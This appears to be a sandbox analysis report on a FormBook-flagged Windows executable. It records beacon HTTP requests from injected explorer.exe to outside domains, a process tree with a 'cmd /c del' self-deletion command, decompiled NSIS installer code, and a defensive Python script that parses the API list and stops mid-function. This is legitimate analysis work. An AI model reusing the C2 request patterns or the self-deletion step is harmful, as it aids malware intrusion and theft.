                                                                        Apr 8, 2021 11:10:53.912617922 CEST | 5146 | OUT | GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.de-knutselkeet.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:53.936810970 CEST | 5146 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 08 Apr 2021 09:10:53 GMT
                                                                        Server: Apache/2.4.10
                                                                        Location: https://www.skkek.nl/wp/de-knutselkeet/
                                                                        Content-Length: 247
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.skkek.nl/wp/de-knutselkeet/">here</a>.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        9 | 192.168.2.3 | 49743 | 45.88.202.115 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 11:10:59.077899933 CEST | 5165 | OUT | GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.autotrafficbot.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:59.105108976 CEST | 5166 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 09:10:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Memory Usage

                                                                        High Level Behavior Distribution

                                                                        Behavior

                                                                        System Behavior

                                                                        General

                                                                        Start time:11:09:16
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase:0x400000
                                                                        File size:207024 bytes
                                                                        MD5 hash:F818665DD48A93C48255D3CEADF92A6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:11:09:17
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\TazxfJHRhq.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase:0x400000
                                                                        File size:207024 bytes
                                                                        MD5 hash:F818665DD48A93C48255D3CEADF92A6E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:11:09:22
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff714890000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time: 11:09:32
                                                                        Start date: 08/04/2021
                                                                        Path: C:\Windows\SysWOW64\cmstp.exe
                                                                        Wow64 process (32bit): true
                                                                        Commandline: C:\Windows\SysWOW64\cmstp.exe
                                                                        Imagebase: 0x1190000
                                                                        File size: 82944 bytes
                                                                        MD5 hash: 4833E65ED211C7F118D4A11E6FB58A09
                                                                        Has elevated privileges: true
                                                                        Has administrator privileges: true
                                                                        Programmed in: C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation: moderate

                                                                        General

                                                                        Start time: 11:09:37
                                                                        Start date: 08/04/2021
                                                                        Path: C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit): true
                                                                        Commandline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
                                                                        Imagebase: 0x10a0000
                                                                        File size: 232960 bytes
                                                                        MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges: true
                                                                        Has administrator privileges: true
                                                                        Programmed in: C, C++ or other language
                                                                        Reputation: high

                                                                        General

                                                                        Start time: 11:09:37
                                                                        Start date: 08/04/2021
                                                                        Path: C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit): false
                                                                        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase: 0x7ff6b2800000
                                                                        File size: 625664 bytes
                                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges: true
                                                                        Has administrator privileges: true
                                                                        Programmed in: C, C++ or other language
                                                                        Reputation: high

                                                                        Disassembly

                                                                        Code Analysis

                                                                          Executed Functions

                                                                          C-Code - Quality: 86%
                                                                          			_entry_() {
                                                                          				struct _SHFILEINFOA _v356;
                                                                          				long _v372;
                                                                          				char _v380;
                                                                          				int _v396;
                                                                          				CHAR* _v400;
                                                                          				signed int _v404;
                                                                          				signed int _v408;
                                                                          				char _v416;
                                                                          				intOrPtr _v424;
                                                                          				intOrPtr _t31;
                                                                          				void* _t36;
                                                                          				CHAR* _t41;
                                                                          				signed int _t43;
                                                                          				CHAR* _t46;
                                                                          				signed int _t48;
                                                                          				int _t52;
                                                                          				signed int _t56;
                                                                          				void* _t78;
                                                                          				CHAR* _t89;
                                                                          				signed int _t90;
                                                                          				void* _t91;
                                                                          				CHAR* _t96;
                                                                          				signed int _t97;
                                                                          				signed int _t99;
                                                                          				signed char* _t103;
                                                                          				CHAR* _t105;
                                                                          				signed int _t106;
                                                                          				void* _t108;
                                                                          
                                                                          				_t99 = 0;
                                                                          				_v372 = 0;
                                                                          				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                          				_v380 = 0x20;
                                                                          				__imp__#17();
                                                                          				__imp__OleInitialize(0); // executed
                                                                          				 *0x7a3030 = _t31;
                                                                          				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
                                                                          				E004059BF(0x7a2780, "NSIS Error");
                                                                          				_t89 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                                          				GetTempPathA(0x400, _t89);
                                                                          				_t36 = E00403116(_t108);
                                                                          				_t109 = _t36;
                                                                          				if(_t36 != 0) {
                                                                          					L2:
                                                                          					_t96 = "\"C:\\Users\\hardz\\Desktop\\TazxfJHRhq.exe\" ";
                                                                          					DeleteFileA(_t96); // executed
                                                                          					E004059BF(_t96, GetCommandLineA());
                                                                          					 *0x7a2f80 = GetModuleHandleA(0);
                                                                          					_t41 = _t96;
                                                                          					if("\"C:\\Users\\hardz\\Desktop\\TazxfJHRhq.exe\" " == 0x22) {
                                                                          						_v404 = 0x22;
                                                                          						_t41 =  &M007A9001;
                                                                          					}
                                                                          					_t43 = CharNextA(E004054F7(_t41, _v404));
                                                                          					_v408 = _t43;
                                                                          					while(1) {
                                                                          						_t91 =  *_t43;
                                                                          						_t112 = _t91;
                                                                          						if(_t91 == 0) {
                                                                          							break;
                                                                          						}
                                                                          						__eflags = _t91 - 0x20;
                                                                          						if(_t91 != 0x20) {
                                                                          							L7:
                                                                          							__eflags =  *_t43 - 0x22;
                                                                          							_v404 = 0x20;
                                                                          							if( *_t43 == 0x22) {
                                                                          								_t43 = _t43 + 1;
                                                                          								__eflags = _t43;
                                                                          								_v404 = 0x22;
                                                                          							}
                                                                          							__eflags =  *_t43 - 0x2f;
                                                                          							if( *_t43 != 0x2f) {
                                                                          								L17:
                                                                          								_t43 = E004054F7(_t43, _v404);
                                                                          								__eflags =  *_t43 - 0x22;
                                                                          								if(__eflags == 0) {
                                                                          									_t43 = _t43 + 1;
                                                                          									__eflags = _t43;
                                                                          								}
                                                                          								continue;
                                                                          							} else {
                                                                          								_t43 = _t43 + 1;
                                                                          								__eflags =  *_t43 - 0x53;
                                                                          								if( *_t43 == 0x53) {
                                                                          									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
                                                                          									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
                                                                          										_t99 = _t99 | 0x00000002;
                                                                          										__eflags = _t99;
                                                                          									}
                                                                          								}
                                                                          								__eflags =  *_t43 - 0x4352434e;
                                                                          								if( *_t43 == 0x4352434e) {
                                                                          									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
                                                                          									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
                                                                          										_t99 = _t99 | 0x00000004;
                                                                          										__eflags = _t99;
                                                                          									}
                                                                          								}
                                                                          								__eflags =  *(_t43 - 2) - 0x3d442f20;
                                                                          								if( *(_t43 - 2) == 0x3d442f20) {
                                                                          									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
                                                                          									__eflags = _t43 + 2;
                                                                          									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t43 + 2);
                                                                          									L22:
                                                                          									_t46 = E00402C37(_t112, _t99); // executed
                                                                          									_t105 = _t46;
                                                                          									if(_t105 != 0) {
                                                                          										L32:
                                                                          										E00403501();
                                                                          										__imp__OleUninitialize();
                                                                          										if(_t105 == 0) {
                                                                          											__eflags =  *0x7a3014;
                                                                          											if( *0x7a3014 != 0) {
                                                                          												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
                                                                          												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
                                                                          												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
                                                                          												__eflags = _t106;
                                                                          												if(_t106 != 0) {
                                                                          													__eflags = _t97;
                                                                          													if(_t97 != 0) {
                                                                          														__eflags = _t90;
                                                                          														if(_t90 != 0) {
                                                                          															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
                                                                          															__eflags = _t56;
                                                                          															if(_t56 != 0) {
                                                                          																 *_t97(0, "SeShutdownPrivilege",  &_v400);
                                                                          																_v416 = 1;
                                                                          																_v404 = 2;
                                                                          																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          												_t52 = ExitWindowsEx(2, 0);
                                                                          												__eflags = _t52;
                                                                          												if(_t52 == 0) {
                                                                          													E00401410(9);
                                                                          												}
                                                                          											}
                                                                          											_t48 =  *0x7a302c;
                                                                          											__eflags = _t48 - 0xffffffff;
                                                                          											if(_t48 != 0xffffffff) {
                                                                          												_v396 = _t48;
                                                                          											}
                                                                          											ExitProcess(_v396);
                                                                          										}
                                                                          										E004052BF(_t105, 0x200010);
                                                                          										ExitProcess(2);
                                                                          									}
                                                                          									if( *0x7a2f94 == _t46) {
                                                                          										L31:
                                                                          										 *0x7a302c =  *0x7a302c | 0xffffffff;
                                                                          										_v396 = E00403526();
                                                                          										goto L32;
                                                                          									}
                                                                          									_t103 = E004054F7(_t96, _t46);
                                                                          									while(_t103 >= _t96) {
                                                                          										__eflags =  *_t103 - 0x3d3f5f20;
                                                                          										if(__eflags == 0) {
                                                                          											break;
                                                                          										}
                                                                          										_t103 = _t103 - 1;
                                                                          										__eflags = _t103;
                                                                          									}
                                                                          									_t116 = _t103 - _t96;
                                                                          									_t105 = "Error launching installer";
                                                                          									if(_t103 < _t96) {
                                                                          										lstrcatA(_t89, "~nsu.tmp\\");
                                                                          										CreateDirectoryA(_t89, 0);
                                                                          										_v404 = _v404 & 0x00000000;
                                                                          										do {
                                                                          											 *0x79d940 = 0x22;
                                                                          											lstrcatA(0x79d940, _t89);
                                                                          											lstrcatA(0x79d940, "Au_.exe");
                                                                          											DeleteFileA(0x79d941);
                                                                          											if(_t105 == 0) {
                                                                          												goto L43;
                                                                          											}
                                                                          											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
                                                                          												goto L32;
                                                                          											}
                                                                          											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
                                                                          												E00405707(0x79d941, 0);
                                                                          												if("C:\\Users\\hardz\\AppData\\Local\\Temp" == 0) {
                                                                          													E00405513(0x79e140);
                                                                          												} else {
                                                                          													E004059BF(0x79e140, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                          												}
                                                                          												lstrcatA(0x79d940, "\" ");
                                                                          												lstrcatA(0x79d940, _v400);
                                                                          												lstrcatA(0x79d940, " _?=");
                                                                          												lstrcatA(0x79d940, 0x79e140);
                                                                          												E004054CC(0x79d940);
                                                                          												_t78 = E00405247(0x79d940, _t89);
                                                                          												if(_t78 != 0) {
                                                                          													CloseHandle(_t78);
                                                                          													_t105 = 0;
                                                                          												}
                                                                          											}
                                                                          											L43:
                                                                          											"Au_.exe" =  &("Au_.exe"[1]);
                                                                          											_v404 = _v404 + 1;
                                                                          										} while (_v404 < 0x1a);
                                                                          										goto L32;
                                                                          									}
                                                                          									 *_t103 =  *_t103 & 0x00000000;
                                                                          									_t104 =  &(_t103[4]);
                                                                          									if(E004055AC(_t116,  &(_t103[4])) == 0) {
                                                                          										goto L32;
                                                                          									}
                                                                          									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                                                                          									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                                                                          									_t105 = 0;
                                                                          									goto L31;
                                                                          								}
                                                                          								goto L17;
                                                                          							}
                                                                          						} else {
                                                                          							goto L6;
                                                                          						}
                                                                          						do {
                                                                          							L6:
                                                                          							_t43 = _t43 + 1;
                                                                          							__eflags =  *_t43 - 0x20;
                                                                          						} while ( *_t43 == 0x20);
                                                                          						goto L7;
                                                                          					}
                                                                          					goto L22;
                                                                          				}
                                                                          				GetWindowsDirectoryA(_t89, 0x3fb);
                                                                          				lstrcatA(_t89, "\\Temp");
                                                                          				if(E00403116(_t109) == 0) {
                                                                          					goto L32;
                                                                          				}
                                                                          				goto L2;
                                                                          			}

                                                                          0x0040325d
                                                                          0x0040325d
                                                                          0x0040325b
                                                                          0x00403260
                                                                          0x00403266
                                                                          0x0040326e
                                                                          0x00403271
                                                                          0x00403273
                                                                          0x00403273
                                                                          0x00403273
                                                                          0x00403271
                                                                          0x00403276
                                                                          0x0040327d
                                                                          0x00403297
                                                                          0x0040329b
                                                                          0x004032a4
                                                                          0x004032a9
                                                                          0x004032aa
                                                                          0x004032af
                                                                          0x004032b3
                                                                          0x00403316
                                                                          0x00403316
                                                                          0x0040331b
                                                                          0x00403323
                                                                          0x0040344e
                                                                          0x00403455
                                                                          0x00403471
                                                                          0x0040347e
                                                                          0x00403487
                                                                          0x00403489
                                                                          0x0040348b
                                                                          0x0040348d
                                                                          0x0040348f
                                                                          0x00403491
                                                                          0x00403493
                                                                          0x004034a3
                                                                          0x004034a5
                                                                          0x004034a7
                                                                          0x004034b4
                                                                          0x004034c3
                                                                          0x004034cb
                                                                          0x004034d3
                                                                          0x004034d3
                                                                          0x004034a7
                                                                          0x00403493
                                                                          0x0040348f
                                                                          0x004034d8
                                                                          0x004034de
                                                                          0x004034e0
                                                                          0x004034e4
                                                                          0x004034e4
                                                                          0x004034e0
                                                                          0x004034e9
                                                                          0x004034ee
                                                                          0x004034f1
                                                                          0x004034f3
                                                                          0x004034f3
                                                                          0x004034fb
                                                                          0x004034fb
                                                                          0x0040332f
                                                                          0x00403336
                                                                          0x00403336
                                                                          0x004032bb
                                                                          0x00403306
                                                                          0x00403306
                                                                          0x00403312
                                                                          0x00000000
                                                                          0x00403312
                                                                          0x004032c4
                                                                          0x004032d1
                                                                          0x004032c8
                                                                          0x004032ce
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032d0
                                                                          0x004032d0
                                                                          0x004032d0
                                                                          0x004032d5
                                                                          0x004032d7
                                                                          0x004032dc
                                                                          0x00403342
                                                                          0x0040334a
                                                                          0x00403350
                                                                          0x0040335f
                                                                          0x00403361
                                                                          0x0040336a
                                                                          0x00403375
                                                                          0x0040337f
                                                                          0x00403387
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004033b3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004033c9
                                                                          0x004033d2
                                                                          0x004033de
                                                                          0x004033ee
                                                                          0x004033e0
                                                                          0x004033e6
                                                                          0x004033e6
                                                                          0x004033f9
                                                                          0x00403403
                                                                          0x0040340e
                                                                          0x00403415
                                                                          0x0040341b
                                                                          0x00403422
                                                                          0x00403429
                                                                          0x0040342c
                                                                          0x00403432
                                                                          0x00403432
                                                                          0x00403429
                                                                          0x00403434
                                                                          0x00403434
                                                                          0x0040343a
                                                                          0x0040343e
                                                                          0x00000000
                                                                          0x00403449
                                                                          0x004032de
                                                                          0x004032e1
                                                                          0x004032ec
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032f4
                                                                          0x004032ff
                                                                          0x00403304
                                                                          0x00000000
                                                                          0x00403304
                                                                          0x00000000
                                                                          0x0040327d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403231
                                                                          0x00403231
                                                                          0x00403231
                                                                          0x00403232
                                                                          0x00403232
                                                                          0x00000000
                                                                          0x00403231
                                                                          0x00000000
                                                                          0x00403295
                                                                          0x004031bc
                                                                          0x004031c8
                                                                          0x004031d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          • #17.COMCTL32 ref: 00403164
                                                                          • OleInitialize.OLE32(00000000), ref: 0040316B
                                                                          • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                                                            • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                                                            • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                          • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\TazxfJHRhq.exe" ), ref: 004031E0
                                                                          • GetCommandLineA.KERNEL32 ref: 004031E6
                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000), ref: 004031F5
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000020), ref: 00403220
                                                                          • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                                                          • ExitProcess.KERNEL32 ref: 00403336
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\TazxfJHRhq.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                                                          • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                                                          • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                                                          • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                                                          • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                                                          • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                                                          • CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1
                                                                          • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                                                          • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                                                          • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                                                          • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                                                          • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                                                          • ExitProcess.KERNEL32 ref: 004034FB
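The call list above is the start-up path of the standard NSIS stub's uninstaller branch rather than anything specific to this sample: GetTempPathA, a `~nsu.tmp\` directory, a copy of the running image named `Au_.exe`, an `lstrcmpiA` against `u_.exe`, an ` _?=` argument for the re-launched copy, and, at the end, token-privilege APIs resolved by name followed by `ExitWindowsEx(00000002)`, which is `EWX_REBOOT`. Because the same sequence recurs in every NSIS-packed sample, it is worth recognising mechanically so it is not mistaken for payload behaviour. The Python below is an added example, not part of this report or of the sandbox, that parses lines in the report's `Api.Module(args), ref: address` format into records and flags that pattern. The sample lines are copied from the list above (backslashes escaped for Python); the finding keys are labels invented for this example.

```python
import re

# Lines copied from this function's API list in the report (the sandbox's own
# "Api.Module(args), ref: address" format); backslashes are escaped for Python.
SAMPLE_API_LINES = [
    "• #17.COMCTL32 ref: 00403164",
    "• OleInitialize.OLE32(00000000), ref: 0040316B",
    "  • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC",
    "• GetTempPathA.KERNEL32(00000400,C:\\Users\\user\\AppData\\Local\\Temp\\,007A2780,NSIS Error), ref: 004031A7",
    "• lstrcatA.KERNEL32(C:\\Users\\user\\AppData\\Local\\Temp\\,~nsu.tmp\\,\"C:\\Users\\user\\Desktop\\TazxfJHRhq.exe\" ,00000000,00000000,00000000,00000020), ref: 00403342",
    "• lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\\Users\\user\\AppData\\Local\\Temp\\), ref: 00403375",
    "• GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399",
    "• lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB",
    "• CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1",
    "• lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E",
    "• GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C",
    "• ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8",
    "• ExitProcess.KERNEL32 ref: 004034FB",
]

API_RE = re.compile(
    r"(?P<api>#?\w+)\.(?P<module>[A-Za-z0-9_.]+)"      # Api.Module (ordinal imports look like #17)
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# ExitWindowsEx uFlags bits from winuser.h; no bit set means EWX_LOGOFF.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE", 0x8: "EWX_POWEROFF"}


def parse_api_lines(lines):
    """Turn report lines into dicts with api, module, args (list), ref and subcall."""
    records = []
    for line in lines:
        m = API_RE.search(line)
        if not m:
            continue                      # heading, blank line, or other non-API text
        args = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": m.group("ref").upper(),
            "subcall": "Part of subcall function" in line,
        })
    return records


def decode_ewx(hex_arg):
    """Decode the sandbox's hex uFlags argument of ExitWindowsEx into flag names."""
    value = int(hex_arg, 16)
    return [name for bit, name in EWX_FLAGS.items() if value & bit] or ["EWX_LOGOFF"]


def triage(records):
    """Flag the stock NSIS stub behaviours visible in a call list.
    The finding keys are labels invented for this example."""
    apis = {r["api"] for r in records}
    args = {a for r in records for a in r["args"]}
    findings = {}
    if "CopyFileA" in apis and "Au_.exe" in args and any(a.startswith("~nsu.tmp") for a in args):
        msg = "copies itself to %TEMP%\\~nsu.tmp\\Au_.exe"
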